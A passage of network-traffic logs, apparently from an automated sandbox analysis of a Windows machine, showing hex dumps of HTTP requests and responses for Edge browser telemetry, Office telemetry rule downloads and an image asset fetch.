                                                                                                                                                                                                                                                      2024-11-30 21:38:50 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:50 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:50 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:50 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:50 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:50 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:50 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:52 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:51 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-11-30 21:38:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      132192.168.2.104986318.165.220.574432116C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:50 UTC925OUTGET /b?rn=1733002729077&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2A00BA3058306B91366DAF7759986AB6&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                      Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                      Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                      2024-11-30 21:38:50 UTC955INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:50 GMT
                                                                                                                                                                                                                                                      Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                      Location: /b2?rn=1733002729077&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2A00BA3058306B91366DAF7759986AB6&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                      set-cookie: UID=1B0c09bfdb4875be38be8541733002730; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                      set-cookie: XID=1B0c09bfdb4875be38be8541733002730; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                      Via: 1.1 70e1e87190c65708c8aabee95d16ac0c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: BAH53-P1
                                                                                                                                                                                                                                                      X-Amz-Cf-Id: 1PdMYyL1HOkD2bC4So8PHvDqzegGGeuaeVgEL9-an98s0WdIUwe58Q==


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      133192.168.2.104990713.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:50 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:51 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:50 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 1395
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                                                                                                      x-ms-request-id: 47663499-e01e-0051-6891-3f84b2000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213850Z-174f7845968ljs8phC1EWRe6en00000011vg000000008sqr
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:51 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      134192.168.2.104990813.107.246.404432116C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:50 UTC438OUTGET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1
                                                                                                                                                                                                                                                      Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                      2024-11-30 21:38:51 UTC523INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:51 GMT
                                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                                      Content-Length: 1579
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Last-Modified: Fri, 03 Nov 2023 21:43:08 GMT
                                                                                                                                                                                                                                                      ETag: 0x8DBDCB5DE99522A
                                                                                                                                                                                                                                                      x-ms-request-id: 1ba40409-901e-0040-4870-4341e9000000
                                                                                                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213851Z-174f78459685m244hC1EWRgp2c00000011v0000000008ytn
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 69316365
                                                                                                                                                                                                                                                      X-Cache: TCP_MISS
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:51 UTC1579INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 c0 49 44 41 54 78 01 ed 58 4f 8b 5c 45 10 af 7a f3 66 66 15 c5 fd 00 42 66 f2 05 b2 22 c2 1e 54 d6 4f 90 15 c1 63 d8 e0 49 04 37 01 11 11 25 89 e0 d5 04 0f 1a f0 e0 e6 62 c4 cb 1e 44 50 21 b8 df 20 7b f0 4f 6e 1b 4f 8b 20 cc 7a 89 b3 ef 75 57 f9 ab ea 9e 37 cb 66 77 66 36 93 83 84 ad a4 d3 fd de eb 79 fd 7b bf fa 55 75 75 88 4e ed d4 9e 20 5b d9 dc ed 2d df de ed d1 63 34 a6 39 6c e5 fb c1 4a 54 39 2f 42 ab 22 d2 8b 91 54 a2 92 d4 91 63 90 6d 09 74 57 2a fd fc b7 77 9e df a6 47 b4 47 02 b8 f2 f3 60 29
                                                                                                                                                                                                                                                      Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaIDATxXO\EzffBf"TOcI7%bDP! {OnO zuW7fwf6y{UuuN [-c49lJT9/B"TcmtW*wGG`)


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      135192.168.2.104990913.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:50 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:51 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:51 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 1358
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BE6431446"
                                                                                                                                                                                                                                                      x-ms-request-id: 2a3cc61f-301e-001f-7491-3faa3a000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213851Z-174f7845968xlwnmhC1EWR0sv800000011tg00000000beq3
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:51 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      136192.168.2.104991013.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:51 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:51 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:51 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 1395
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                                                                                                      x-ms-request-id: 6ff37f82-301e-001f-5b9a-42aa3a000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213851Z-174f7845968qj8jrhC1EWRh41s00000011yg000000008fda
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:51 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      137192.168.2.104991113.107.246.404432116C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
